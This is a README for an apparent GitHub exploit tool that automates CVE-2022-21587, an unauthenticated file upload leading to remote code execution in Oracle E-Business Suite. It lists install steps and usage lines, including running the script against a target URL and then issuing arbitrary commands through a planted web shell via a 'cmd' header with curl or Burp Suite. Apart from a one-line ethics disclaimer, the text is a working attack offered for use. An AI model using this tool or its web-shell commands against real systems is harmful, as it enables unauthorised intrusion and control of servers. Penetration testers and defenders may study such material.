/CVE-2022-21587-Oracle-EBS-

This script is used for automating exploit for Oracle Ebussiness (EBS) for CVE 2022-21587 ( Unauthenticated File Upload For Remote Code Execution)

Primary LanguagePython

Prerequirement for this exploit to run:

  • python3 including module (requests, os, sys, slipit)
  • uuencode

Before you run, make sure to use for only on ethical duties

if the exploit Fail to run:

  • Make sure you already install the pre req module

install requests

  • pip3 install requests

  • Install slipit, git clone https://github.com/usdAG/slipit

    • cd slipit
    • python3 setup.py sdist
    • pip3 install --user dist/* OR python3 -m pip install --user dist/*

  • Install uuencode

    • sudo apt install sharutils

  • Usage : python3 exploit.py http://target.com

    • then the shell will poping up OR you can also execute the shell using curl or web proxies tools(burpsuite)
    • using curl : curl -k https://target/OA_CGI/FNDWRR.exe -H 'cmd: whoami'
    • using burpsuite: Just adding cmd in header request with any bash payload you want execute